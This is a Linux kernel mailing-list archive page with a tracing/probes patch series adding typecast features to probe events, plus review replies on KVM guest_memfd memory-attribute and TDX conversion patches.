Linux Trace Kernel
 help / color / mirror / Atom feed
* [PATCH v7 02/10] tracing/probes: Rename FETCH_OP_DATA to FETCH_OP_IMMSTR
From: Masami Hiramatsu (Google) @ 2026-06-23  1:44 UTC (permalink / raw)
  To: Steven Rostedt, Mathieu Desnoyers
  Cc: Jonathan Corbet, Shuah Khan, Masami Hiramatsu, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest
In-Reply-To: <178217904992.643090.15726197350652241270.stgit@devnote2>

From: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Since FETCH_OP_DATA is used solely to store immediate string
values, rename it to the more specific FETCH_OP_IMMSTR.

No behavior change, just rename it.

Signed-off-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>
---
 kernel/trace/trace_probe.c      |   12 ++++++------
 kernel/trace/trace_probe.h      |    2 +-
 kernel/trace/trace_probe_tmpl.h |    2 +-
 3 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index 502fa6da5949..d1c55596725b 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1307,7 +1307,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 				break;
 			ctx->offset = cur_offs;
 			if (code->op == FETCH_OP_COMM ||
-			    code->op == FETCH_OP_DATA) {
+			    code->op == FETCH_OP_IMMSTR) {
 				trace_probe_log_err(ctx->offset, COMM_CANT_DEREF);
 				return -EINVAL;
 			}
@@ -1328,7 +1328,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 			ret = __parse_imm_string(arg + 2, &tmp, ctx->offset + 2);
 			if (ret)
 				break;
-			code->op = FETCH_OP_DATA;
+			code->op = FETCH_OP_IMMSTR;
 			code->data = tmp;
 		} else {
 			ret = str_to_immediate(arg + 1, &code->immediate);
@@ -1483,7 +1483,7 @@ static int finalize_fetch_insn(struct fetch_insn *code,
 		} else {
 			if (code->op != FETCH_OP_DEREF && code->op != FETCH_OP_UDEREF &&
 			    code->op != FETCH_OP_IMM && code->op != FETCH_OP_COMM &&
-			    code->op != FETCH_OP_DATA && code->op != FETCH_OP_TP_ARG) {
+			    code->op != FETCH_OP_IMMSTR && code->op != FETCH_OP_TP_ARG) {
 				trace_probe_log_err(ctx->offset + type_offset,
 						    BAD_STRING);
 				return -EINVAL;
@@ -1492,7 +1492,7 @@ static int finalize_fetch_insn(struct fetch_insn *code,
 
 		if (!strcmp(parg->type->name, "symstr") ||
 		    (code->op == FETCH_OP_IMM || code->op == FETCH_OP_COMM ||
-		     code->op == FETCH_OP_DATA) || code->op == FETCH_OP_TP_ARG ||
+		     code->op == FETCH_OP_IMMSTR) || code->op == FETCH_OP_TP_ARG ||
 		     parg->count) {
 			/*
 			 * IMM, DATA and COMM is pointing actual address, those
@@ -1668,7 +1668,7 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
 	if (ret < 0) {
 		for (code = tmp; code < tmp + FETCH_INSN_MAX; code++)
 			if (code->op == FETCH_NOP_SYMBOL ||
-			    code->op == FETCH_OP_DATA)
+			    code->op == FETCH_OP_IMMSTR)
 				kfree(code->data);
 	}
 	kfree(tmp);
@@ -1767,7 +1767,7 @@ void traceprobe_free_probe_arg(struct probe_arg *arg)
 
 	while (code && code->op != FETCH_OP_END) {
 		if (code->op == FETCH_NOP_SYMBOL ||
-		    code->op == FETCH_OP_DATA)
+		    code->op == FETCH_OP_IMMSTR)
 			kfree(code->data);
 		code++;
 	}
diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 0f09f7aaf93f..cd586e67b21a 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -94,7 +94,7 @@ enum fetch_op {
 	FETCH_OP_COMM,		/* Current comm */
 	FETCH_OP_ARG,		/* Function argument : .param */
 	FETCH_OP_FOFFS,		/* File offset: .immediate */
-	FETCH_OP_DATA,		/* Allocated data: .data */
+	FETCH_OP_IMMSTR,	/* Allocated string: .data */
 	FETCH_OP_EDATA,		/* Entry data: .offset */
 	// Stage 2 (dereference) op
 	FETCH_OP_DEREF,		/* Dereference: .offset */
diff --git a/kernel/trace/trace_probe_tmpl.h b/kernel/trace/trace_probe_tmpl.h
index f39b37fcdb3b..51436f19083b 100644
--- a/kernel/trace/trace_probe_tmpl.h
+++ b/kernel/trace/trace_probe_tmpl.h
@@ -109,7 +109,7 @@ process_common_fetch_insn(struct fetch_insn *code, unsigned long *val)
 	case FETCH_OP_COMM:
 		*val = (unsigned long)current->comm;
 		break;
-	case FETCH_OP_DATA:
+	case FETCH_OP_IMMSTR:
 		*val = (unsigned long)code->data;
 		break;
 	default:


^ permalink raw reply related

* [PATCH v7 01/10] tracing/probes: Fix double addition of offset for @+FOFFSET
From: Masami Hiramatsu (Google) @ 2026-06-23  1:44 UTC (permalink / raw)
  To: Steven Rostedt, Mathieu Desnoyers
  Cc: Jonathan Corbet, Shuah Khan, Masami Hiramatsu, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest
In-Reply-To: <178217904992.643090.15726197350652241270.stgit@devnote2>

From: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Since commit 533059281ee5 ("tracing: probeevent: Introduce new argument
 fetching code") wrongly uses the @offset local variable during parsing,
the offset value is added twice when dereferencing.
Reset @offset after setting it in FETCH_OP_FOFFS.

Fixes: 533059281ee5 ("tracing: probeevent: Introduce new argument fetching code")
Signed-off-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>
Cc: stable@vger.kernel.org
---
 kernel/trace/trace_probe.c |    1 +
 1 file changed, 1 insertion(+)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index 98532c503d02..502fa6da5949 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1241,6 +1241,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 
 			code->op = FETCH_OP_FOFFS;
 			code->immediate = (unsigned long)offset;  // imm64?
+			offset = 0;
 		} else {
 			/* uprobes don't support symbols */
 			if (!(ctx->flags & TPARG_FL_KERNEL)) {


^ permalink raw reply related

* [PATCH v7 00/10] tracing/probes: Add more typecast features
From: Masami Hiramatsu (Google) @ 2026-06-23  1:44 UTC (permalink / raw)
  To: Steven Rostedt, Mathieu Desnoyers
  Cc: Jonathan Corbet, Shuah Khan, Masami Hiramatsu, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest

Hi,

Here is the 7th version of series to introduce more typecast features
to probe events. The previous version is here:

 https://lore.kernel.org/all/178201238795.570818.15573963115625446598.stgit@devnote2/

In this version, I added 2 new patches (a fix and a cleanup) and updated
the series according to Sashiko's review. [1/10] fixes a long-standing
issue with @+FOFFS, which was wrongly adding the offset twice. [2/10] is
a cleanup patch that renames a fetch_op (good for dumping it).
This is applicable against probes/core branch on linux-trace tree.

Steve introduced the BTF typecast feature for eprobe[1].
This series extends it and adds more options:

1. Expanding BTF typecast to kprobe and fprobe.
   (currently only function entry/exit)

2. Introduce a container_of-like typecast. This adds an "assigned
   member" option to the typecast.

   (STRUCT,MEMBER)VAR->ANOTHER_MEMBER

   This casts VAR to the STRUCT type, treating VAR as the address
   of STRUCT.MEMBER. In C, it is:

   container_of(VAR, STRUCT, MEMBER)->ANOTHER_MEMBER

3. Support nested typecast, e.g.

   (STRUCT)((STRUCT2)VAR->MEMBER2)->MEMBER

   the nest level must be smaller than 3.

4. Add $current variable to point to the "current" task_struct.
   This is useful with typecast, e.g.

   (task_struct)$current->pid

5. per-cpu dereference support.

   Introduce this_cpu_read(VAR) and this_cpu_ptr(VAR) to
   access per-cpu data on the current CPU (accessing another CPU's
   data is not stable, because it can be changed).

   You can access the member of per-cpu data structure using
   typecast like:

   (STRUCT)this_cpu_ptr(VAR)->MEMBER

This series also adds a fetcharg dump feature (for debugging) and updates
the test scripts to test part of these features.

Thanks,

---
base-commit: 3ec75d0067f30eb5e0730f033766d6ab2feca7ae

Masami Hiramatsu (Google) (10):
      tracing/probes: Fix double addition of offset for @+FOFFSET
      tracing/probes: Rename FETCH_OP_DATA to FETCH_OP_IMMSTR
      tracing/probes: Support dumping fetcharg program for debugging dynamic events
      tracing/probes: Support typecast for various probe events
      tracing/probes: Support nested typecast
      tracing/probes: Type casting always involves nested calls
      tracing/probes: Support field specifier option for typecast
      tracing/probes: Add $current variable support
      tracing/probes: Add this_cpu_read() and this_cpu_ptr() dereference method to fetcharg
      tracing/probes: Add a new testcase for BTF typecasts


 Documentation/trace/eprobetrace.rst                |    9 
 Documentation/trace/fprobetrace.rst                |   10 
 Documentation/trace/kprobetrace.rst                |   11 
 kernel/trace/Kconfig                               |   11 
 kernel/trace/trace.c                               |    8 
 kernel/trace/trace_eprobe.c                        |    2 
 kernel/trace/trace_fprobe.c                        |    2 
 kernel/trace/trace_kprobe.c                        |    2 
 kernel/trace/trace_probe.c                         |  582 ++++++++++++++++----
 kernel/trace/trace_probe.h                         |   98 ++-
 kernel/trace/trace_probe_tmpl.h                    |   27 +
 kernel/trace/trace_uprobe.c                        |    3 
 samples/trace_events/trace-events-sample.c         |   40 +
 samples/trace_events/trace-events-sample.h         |   34 +
 .../ftrace/test.d/dynevent/btf_probe_event.tc      |   51 ++
 .../ftrace/test.d/dynevent/fprobe_syntax_errors.tc |   11 
 .../ftrace/test.d/kprobe/kprobe_syntax_errors.tc   |   11 
 .../ftrace/test.d/kprobe/uprobe_syntax_errors.tc   |    5 
 18 files changed, 756 insertions(+), 161 deletions(-)
 create mode 100644 tools/testing/selftests/ftrace/test.d/dynevent/btf_probe_event.tc

--
Masami Hiramatsu (Google) <mhiramat@kernel.org>

^ permalink raw reply

* Re: [PATCH v8 01/46] KVM: guest_memfd: Introduce per-gmem attributes, use to guard user mappings
From: Sean Christopherson @ 2026-06-23  1:37 UTC (permalink / raw)
  To: Binbin Wu
  Cc: ackerleytng, aik, andrew.jones, brauner, chao.p.peng, david,
	jmattson, jthoughton, michael.roth, oupton, pankaj.gupta, qperret,
	rick.p.edgecombe, rientjes, shivankg, steven.price, tabba, willy,
	wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <aceb07e1-77bc-49b6-a932-5fd9b5a21727@linux.intel.com>

On Mon, Jun 22, 2026, Binbin Wu wrote:
> On 6/19/2026 8:31 AM, Ackerley Tng via B4 Relay wrote:
> 
> [...]
> 
> >  
> > +static u64 kvm_gmem_get_attributes(struct inode *inode, pgoff_t index)
> > +{
> > +	struct maple_tree *mt = &GMEM_I(inode)->attributes;
> > +	void *entry = mtree_load(mt, index);
> > +
> > +	return WARN_ON_ONCE(!entry) ? 0 : xa_to_value(entry);
> 
> If the entry is unexpectedly missing, returning 0 means the attribute would
> be treated as shared.  And then in kvm_gmem_fault_user_mapping(), it would
> allow the userspace to fault in the folio.
> 
> Should gmem deny such edge case?

After several bugs this year where a WARN_ON_ONCE() fired, but was entirely
insufficient to prevent true badness, I'm definitely sensitive to making the "bad"
behavior as harmless as possible.

However, in this case I think we're just hosed.  If KVM treats the memory as
private, KVM will incorrectly do prepare(), incorrectly allow populate(), and
will cause missed invalidations (though I suppose __kvm_gmem_set_attributes()
"only" lies to userspace in that case).

That said, assuming SHARED is definitely odd for cases where guest_memfd *can't*
hold shared memory.  Ditto for assuming PRIVATE.  What if we instead fall back to
the "init" state, e.g.?

static u64 kvm_gmem_get_attributes(struct inode *inode, pgoff_t index)
{
	struct maple_tree *mt = &GMEM_I(inode)->attributes;
	void *entry = mtree_load(mt, index);

	if (WARN_ON_ONCE(!entry)) {
		bool shared = GMEM_I(inode)->flags & GUEST_MEMFD_FLAG_INIT_SHARED;

		return shared ? 0 : KVM_MEMORY_ATTRIBUTE_PRIVATE;
	}

	return xa_to_value(entry);
}

^ permalink raw reply

* Re: [PATCH v8 23/46] KVM: TDX: Make source page optional for KVM_TDX_INIT_MEM_REGION
From: Sean Christopherson @ 2026-06-23  1:24 UTC (permalink / raw)
  To: Fuad Tabba
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	willy, wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <CA+EHjTyj-JdW8H0ii2j3dayqnT2s3VV+brSG++p335=FGd2GXg@mail.gmail.com>

On Fri, Jun 19, 2026, Fuad Tabba wrote:
> nit: why does it have Sean's SoB?

Heh, I had the same question at first.  It's because I tweaked the module param
name to gmem_in_place_conversion, and so updated this patch and sent that version
to Ackerley off-list.  Ackerley's SoB really should come last in this case, even
though it creates a somewhat weird SoB chain given the author.

^ permalink raw reply

* Re: [PATCH v8 23/46] KVM: TDX: Make source page optional for KVM_TDX_INIT_MEM_REGION
From: Sean Christopherson @ 2026-06-23  1:22 UTC (permalink / raw)
  To: Yan Zhao
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	tabba, willy, wyihan, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <ajjc0hw8PjGw69e9@yzhao56-desk.sh.intel.com>

On Mon, Jun 22, 2026, Yan Zhao wrote:
> On Thu, Jun 18, 2026 at 05:32:00PM -0700, Ackerley Tng via B4 Relay wrote:
> > From: Ackerley Tng <ackerleytng@google.com>
> > 
> > Update tdx_gmem_post_populate() to handle cases where a source page is
> > not explicitly provided. Instead of returning -EOPNOTSUPP when src_page
> > is NULL, default to using the page associated with the destination PFN.
> > 
> > This change allows for in-place memory conversion where the data is
> > already present in the target PFN, ensuring the TDX module has a valid
> > source page reference for the TDH.MEM.PAGE.ADD operation.
> > 
> > Signed-off-by: Ackerley Tng <ackerleytng@google.com>
> > Signed-off-by: Sean Christopherson <seanjc@google.com>
> > ---
> >  Documentation/virt/kvm/x86/intel-tdx.rst |  4 ++++
> >  arch/x86/kvm/vmx/tdx.c                   | 11 ++++++++---
> >  2 files changed, 12 insertions(+), 3 deletions(-)
> > 
> > diff --git a/Documentation/virt/kvm/x86/intel-tdx.rst b/Documentation/virt/kvm/x86/intel-tdx.rst
> > index 6a222e9d09541..74357fe87f9ec 100644
> > --- a/Documentation/virt/kvm/x86/intel-tdx.rst
> > +++ b/Documentation/virt/kvm/x86/intel-tdx.rst
> > @@ -158,6 +158,10 @@ KVM_TDX_INIT_MEM_REGION
> >  Initialize @nr_pages TDX guest private memory starting from @gpa with userspace
> >  provided data from @source_addr. @source_addr must be PAGE_SIZE-aligned.
> >  
> > +If guest_memfd in-place conversion is enabled, pass NULL for @source_addr to
> > +initialize the memory region using memory contents already populated in
> > +guest_memfd memory.
> > +
> >  Note, before calling this sub command, memory attribute of the range
> >  [gpa, gpa + nr_pages] needs to be private.  Userspace can use
> >  KVM_SET_MEMORY_ATTRIBUTES to set the attribute.
> > diff --git a/arch/x86/kvm/vmx/tdx.c b/arch/x86/kvm/vmx/tdx.c
> > index ffe9d0db58c59..56d10333c61a7 100644
> > --- a/arch/x86/kvm/vmx/tdx.c
> > +++ b/arch/x86/kvm/vmx/tdx.c
> > @@ -3198,8 +3198,12 @@ static int tdx_gmem_post_populate(struct kvm *kvm, gfn_t gfn, kvm_pfn_t pfn,
> >  	if (KVM_BUG_ON(kvm_tdx->page_add_src, kvm))
> >  		return -EIO;
> >  
> > -	if (!src_page)
> > -		return -EOPNOTSUPP;
> > +	if (!src_page) {
> > +		if (!gmem_in_place_conversion)
> When userspace turns on gmem_in_place_conversion while creating guest_memfd
> without the MMAP flag, the absence of src_page should still be treated as an
> error.

Why MMAP?  Shouldn't this be a general "if (!src_page && !up-to-date)"?  Just
because userspace _can_ mmap() the memory doesn't mean userspace _has_ mmap()'d
and written memory.  And when write() lands, MMAP wouldn't be necessary to
initialize the memory.

> Additionally, to properly enable in-place copying for the TDX initial memory
> region, userspace must not only specify source_addr to NULL, but also follow
> a specific sequence (where steps 1/2/3/7 are required only for in-place copy):
> 1. create guest_memfd with MMAP flag
> 2. mmap the guest_memfd.
> 3. convert the initial memory range to shared.
> 4. copy initial content to the source page.
> 5. convert the initial memory range to private
> 6. invoke ioctl KVM_TDX_INIT_MEM_REGION.
> 7. do not unmap the source backend.
> 
> So, would it be reasonable to introduce a dedicated flag that allows userspace
> to explicitly opt into the in-place copy functionality? e.g.,

Why?  It's userspace's responsibility to get the above right.  If userspace fails
to provide a src_page when it doesn't want in-place copy, that's a userspace bug.

^ permalink raw reply

* Re: [PATCH v8 15/46] KVM: guest_memfd: Call arch invalidate hooks on conversion
From: Sean Christopherson @ 2026-06-23  1:15 UTC (permalink / raw)
  To: Fuad Tabba
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	willy, wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <CA+EHjTx+3U++dnhGEkwh2SO82xMugAvvJ9ee1O__sxZCKL_X5A@mail.gmail.com>

On Fri, Jun 19, 2026, Fuad Tabba wrote:
> On Fri, 19 Jun 2026 at 01:31, Ackerley Tng via B4 Relay
> <devnull+ackerleytng.google.com@kernel.org> wrote:
> >
> > From: Ackerley Tng <ackerleytng@google.com>
> >
> > When memory in guest_memfd is converted from private to shared, the
> > platform-specific state associated with the guest-private pages must be
> > invalidated or cleaned up.
> >
> > Iterate over the folios in the affected range and call the
> > kvm_arch_gmem_invalidate() hook for each PFN range. This allows
> > architectures to perform necessary teardown, such as updating hardware
> > metadata or encryption states, before the pages are transitioned to the
> > shared state.
> >
> > Invoke this helper after indicating to KVM's mmu code that an invalidation
> > is in progress to stop in-flight page faults from succeeding.
> >
> > Reviewed-by: Fuad Tabba <tabba@google.com>
> > Signed-off-by: Ackerley Tng <ackerleytng@google.com>
> 
> Coming back to this after working through the arm64/pKVM side. My
> Reviewed-by here is from the previous round and the patch hasn't
> changed, but I missed an implication for arm64.
> 
> kvm_arch_gmem_invalidate() is now called from two paths with the same
> (start, end) signature: folio teardown (kvm_gmem_free_folio) and
> private->shared conversion (here). For SNP/TDX that's fine, conversion is
> destructive anyway. For pKVM the two need opposite content semantics:
> conversion must preserve the page in place (same physical page, the point
> of in-place conversion without encryption), while teardown must scrub it
> before returning it to the host.
>
> The hook gets only a pfn range with no indication of which caller it's
> serving, so arm64 can't give the two paths the behaviour they need. It
> would help to signal intent on the conversion path: a reason/flag, a
> separate hook, or not routing non-destructive conversion through the
> teardown hook.
> 
> arm64 isn't here yet, so this isn't urgent, but the hook is gaining a
> second caller now, and it's cheaper to leave room for the distinction
> than to change a generic contract other arches depend on later.

Crud.  It may not be urgent for arm64, but it's urgent for other reasons that
I "can't" describe in detail at the moment, and even if that weren't the case, I
think we should clean things up now.  More below.

> >  virt/kvm/guest_memfd.c | 41 +++++++++++++++++++++++++++++++++++++++++
> >  1 file changed, 41 insertions(+)
> >
> > diff --git a/virt/kvm/guest_memfd.c b/virt/kvm/guest_memfd.c
> > index 433f79047b9d1..3c94442bc8131 100644
> > --- a/virt/kvm/guest_memfd.c
> > +++ b/virt/kvm/guest_memfd.c
> > @@ -607,6 +607,42 @@ static bool kvm_gmem_is_safe_for_conversion(struct inode *inode, pgoff_t start,
> >         return safe;
> >  }
> >
> > +#ifdef CONFIG_HAVE_KVM_ARCH_GMEM_INVALIDATE
> > +static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end)

Not your fault, but kvm_arch_gmem_invalidate() is badly misnamed.  It's not
"invalidating" anything, it's much more of a "free" callback, as SNP uses it to
put physical pages back into a shared state when a maybe-private folio is freed.

As Fuad points out, (ab)using that hook for the private=>shared conversion case
"works", but not broadly.  And it makes the bad name worse, because it's called
from code that _is_ doing true invalidations.  For pKVM, it may not even need to
do anything invalidation-like.

To avoid a conflict with patches that are going to have priority over this series,
to set the stage for arm64 support, and to avoid bleeding vendor details
into guest_memfd, as if they are core guest_memfd behavior (only SNP needs the
"invalidation" on this specific transition), I think we should add an arch hook
to do conversions straightaway.

Unless there's a clever option I'm missing, it'll mean adding yet another
HAVE_KVM_ARCH_GMEM_XXX flag?  Hmm, especially because IIUC, arm64/pKVM doesn't
need a callback for this case, only the free_folio case.

> > +{
> > +       struct folio_batch fbatch;
> > +       pgoff_t next = start;
> > +       int i;
> > +
> > +       folio_batch_init(&fbatch);
> > +       while (filemap_get_folios(inode->i_mapping, &next, end - 1, &fbatch)) {
> > +               for (i = 0; i < folio_batch_count(&fbatch); ++i) {
> > +                       struct folio *folio = fbatch.folios[i];
> > +                       pgoff_t start_index, end_index;
> > +                       kvm_pfn_t start_pfn, end_pfn;
> > +
> > +                       start_index = max(start, folio->index);
> > +                       end_index = min(end, folio_next_index(folio));
> > +                       /*
> > +                        * end_index is either in folio or points to
> > +                        * the first page of the next folio. Hence,
> > +                        * all pages in range [start_index, end_index)
> > +                        * are contiguous.
> > +                        */
> > +                       start_pfn = folio_file_pfn(folio, start_index);
> > +                       end_pfn = start_pfn + end_index - start_index;
> > +
> > +                       kvm_arch_gmem_invalidate(start_pfn, end_pfn);
> > +               }
> > +
> > +               folio_batch_release(&fbatch);
> > +               cond_resched();
> > +       }
> > +}
> > +#else
> > +static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end) {}
> > +#endif
> > +
> >  static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
> >                                      size_t nr_pages, uint64_t attrs,
> >                                      pgoff_t *err_index)
> > @@ -647,7 +683,12 @@ static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
> >          */
> >
> >         kvm_gmem_invalidate_start(inode, start, end);
> > +
> > +       if (!to_private)
> > +               kvm_gmem_invalidate(inode, start, end);

E.g. instead make this something like this?

	kvm_gmem_set_pfn_attributes(...)

Hrm, though that wastes folio lookups in the to_private case.  So maybe just this,
assuming pKVM doesn't need to take additional action on conversions?

	if (!to_private)
		kvm_gmem_make_shared(...)

Actually, if we do that, then we don't need a separate arch hook, just a separate
config.  It'll still bleed SNP details into guest_memfd, but it'll at least be
done in a way that's more explicitly arch specific (and it's no different than
what we already do for PREPARE...).

E.g. this?  There will still be a looming rename conflict, but that's easy enough
to handle.

diff --git virt/kvm/guest_memfd.c virt/kvm/guest_memfd.c
index 9ce5be7843f2..8aead0abd788 100644
--- virt/kvm/guest_memfd.c
+++ virt/kvm/guest_memfd.c
@@ -648,8 +648,8 @@ static bool kvm_gmem_is_safe_for_conversion(struct inode *inode, pgoff_t start,
        return safe;
 }
 
-#ifdef CONFIG_HAVE_KVM_ARCH_GMEM_INVALIDATE
-static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end)
+#ifdef CONFIG_KVM_ARCH_GMEM_FREE_ON_SHARED_CONVERSION
+static void kvm_gmem_make_shared(struct inode *inode, pgoff_t start, pgoff_t end)
 {
        struct folio_batch fbatch;
        pgoff_t next = start;
@@ -681,7 +681,7 @@ static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end)
        }
 }
 #else
-static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end) {}
+static void kvm_gmem_make_shared(struct inode *inode, pgoff_t start, pgoff_t end) { }
 #endif
 
 static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
@@ -729,7 +729,7 @@ static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
        kvm_gmem_invalidate_start(inode, start, end);
 
        if (!to_private)
-               kvm_gmem_invalidate(inode, start, end);
+               kvm_gmem_make_shared(inode, start, end);
 
        mas_store_prealloc(&mas, xa_mk_value(attrs));

^ permalink raw reply related

* Re: [PATCH v8 13/46] KVM: guest_memfd: Add base support for KVM_SET_MEMORY_ATTRIBUTES2
From: Sean Christopherson @ 2026-06-23  0:22 UTC (permalink / raw)
  To: Fuad Tabba
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	willy, wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <CA+EHjTx2xKjheiW5VzHw_TdWFUqdJqfgu=dOPa=_yaYBMY8uyw@mail.gmail.com>

On Fri, Jun 19, 2026, Fuad Tabba wrote:
> On Fri, 19 Jun 2026 at 01:31, Ackerley Tng via B4 Relay
> <devnull+ackerleytng.google.com@kernel.org> wrote:
> >
> > From: Ackerley Tng <ackerleytng@google.com>
> >
> > Introduce base support for KVM_SET_MEMORY_ATTRIBUTES2 in guest_memfd, which
> > just updates attributes tracked by guest_memfd.
> >
> > Validate input fields in general. Guard usage of KVM_SET_MEMORY_ATTRIBUTES2
> > by making sure requested attributes are supported for this instance of kvm.
> >
> > A new KVM_SET_MEMORY_ATTRIBUTES2 is defined to support writes (unlike
> > KVM_SET_MEMORY_ATTRIBUTES) in addition to reads so it can provide error
> > details to userspace. This will be used in a later patch.
> >
> > The two ioctls use their corresponding structs with no overlap, but
> > backward compatibility is baked in for future support of
> > KVM_SET_MEMORY_ATTRIBUTES2 and struct kvm_memory_attributes2 in the VM
> > ioctl.
> >
> > The process of setting memory attributes is set up such that the later half
> > will not fail due to allocation. Any necessary checks are performed before
> > the point of no return.
> >
> > Co-developed-by: Vishal Annapurve <vannapurve@google.com>
> > Signed-off-by: Vishal Annapurve <vannapurve@google.com>
> > Co-developed-by: Sean Christopherson <seanjc@google.com>
> > Signed-off-by: Sean Christopherson <seanjc@google.com>
> > Reviewed-by: Fuad Tabba <tabba@google.com>
> > Signed-off-by: Ackerley Tng <ackerleytng@google.com>
> 
> Not sure if it's user error on my part, or if I'm applying this to the
> wrong base, but I found a build break here on patch 13:
> kvm_gmem_invalidate_start() doesn't exist in the base tree. The
> function is kvm_gmem_invalidate_begin() here. The rename
> (190cc5370a8b6) landed via a different merge path and isn't an
> ancestor of the stated base.
> 
> Patches 19 and 20 have the same mismatch. Fix for all three is
> s/kvm_gmem_invalidate_start/kvm_gmem_invalidate_begin/.

Ya, Ackerley used a slightly older kvm/next to send the patches.  I at least was
testing against kvm-x86/next, which does have the rename.

